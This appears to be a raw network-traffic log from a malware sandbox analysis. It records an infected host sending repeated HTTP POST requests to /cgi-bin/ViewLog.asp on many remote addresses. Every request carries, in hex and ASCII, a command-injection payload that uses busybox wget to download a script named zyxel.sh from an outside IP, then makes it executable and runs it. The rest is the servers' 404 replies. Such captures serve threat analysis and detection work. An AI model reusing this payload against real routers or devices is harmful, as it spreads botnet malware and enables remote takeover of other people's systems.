                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.154953003 CET1041INHTTP/1.1 404 Not Found
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 774
                                                        Date: Wed, 14 Feb 2024 08:36:04 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 39 33 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.93</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1382192.168.2.144388894.122.227.1928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.966041088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1383192.168.2.144710894.120.243.258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.966156006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1384192.168.2.144588894.123.154.1248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.967817068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1385192.168.2.146053494.55.80.448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.980638027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1386192.168.2.143649262.151.182.788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.064162970 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.195528030 CET1246INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 1097
                                                        Date: Wed, 14 Feb 2024 08:35:05 GMT
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 33 34 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.34</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1387192.168.2.145615831.136.79.1978080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.137926102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.777601004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.057482958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.617513895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:16.737194061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1388192.168.2.145352694.121.137.1398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.212301970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1389192.168.2.144487894.121.52.1748080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.213356018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1390192.168.2.144502894.121.158.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.215408087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1391192.168.2.144086494.123.104.2478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.215629101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1392192.168.2.143691662.210.122.1258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.327569962 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.588326931 CET341INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 14 Feb 2024 08:36:07 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Content-Encoding: gzip
                                                        Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 21 2b d1 07 59 02 32 54 1f ea 40 00 da 1e 3f 07 a9 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 84(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!+Y2T@?0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1393192.168.2.145979031.136.135.28080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.340240002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.969608068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.217499018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
